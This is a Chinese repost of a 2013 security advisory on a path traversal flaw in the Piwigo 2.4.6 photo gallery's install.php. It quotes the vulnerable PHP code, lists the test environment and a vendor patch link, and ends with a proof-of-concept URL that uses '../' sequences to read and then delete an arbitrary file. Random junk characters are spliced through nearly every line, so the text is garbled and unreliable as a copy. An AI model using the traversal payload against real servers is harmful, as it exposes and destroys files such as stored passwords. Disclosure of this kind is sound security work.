Piwigo是用PHP编写的相册脚本。
8 a: ~0 ] Y& p! W; y" |
7 W- A- J4 Z2 ]% c/ SPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。2 b2 G: ^' L E! X: g
====================================================================
' o( w- {0 o/ S `: X; H/install.php:; \) _* s) V- \0 R7 m5 ]
-------------
5 e( x3 [9 i; B113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))( b* Q& k# K) B4 S6 n! b6 u
114: {' F$ E0 e% f6 m% w4 ]/ U) K
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; s8 y. f% {3 {. M7 V7 m
116: header('Cache-Control: no-cache, must-revalidate');" N5 W7 Z: ^) Q. S1 W' D2 E: v, r
117: header('Pragma: no-cache');
5 a1 ~' C( G! R2 I5 f0 Y! b118: header('Content-Disposition: attachment; filename="database.inc.php"');$ \, _ m3 r1 H! p ~! f \
119: header('Content-Transfer-Encoding: binary');$ r& L8 D! O$ f: R
120: header('Content-Length: '.filesize($filename));
( D9 Q3 r% Q0 K121: echo file_get_contents($filename);
0 S" r0 e$ e: H, \9 _122: unlink($filename);
* H9 m# K- {) z, g* Z123: exit();
9 M$ O( L1 u" }7 X124: }
( B$ |. d# N* Z8 n, A! Z====================================================================$ P, y) W3 Z1 D2 ]' Q( d
4 ?9 r2 Q! ? @. C m
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
' h" I, G( i: b" O6 T& V: s* h Apache 2.4.2 (Win32)( _$ t9 J2 A! L" ^2 n) l
PHP 5.4.4
5 j ~/ n6 Y9 z$ ^6 N MySQL 5.5.25a
! ]+ s- B# e* @$ [( P
e0 i% {, c/ z. tVulnerability discovered by Gjoko 'LiquidWorm' Krstic1 \8 X5 ]5 R6 Q( I( A# M) o5 q
@zeroscience$ M0 B1 p$ R/ V0 _# H2 l/ ?
( z, E0 c x$ m
Advisory ID: ZSL-2013-5127 y2 o- i2 Z g6 _
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
2 ?# w$ u* {# o3 hVendor Patch: http://piwigo.org/bugs/view.php?id=2843
" y, v+ F+ w+ ] 7 S3 { C' e) L/ J6 G' n# a
15.02.2013
% j% |8 K2 ~, h* i9 l 4 Y4 r# g8 B/ J+ k8 W# T
-- T+ n, E" L; N4 {" D- o
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt/ T% D: Q+ v y+ K4 @( N4 X
" T) c+ e# Z# b J6 K$ p; P# v: W! g
|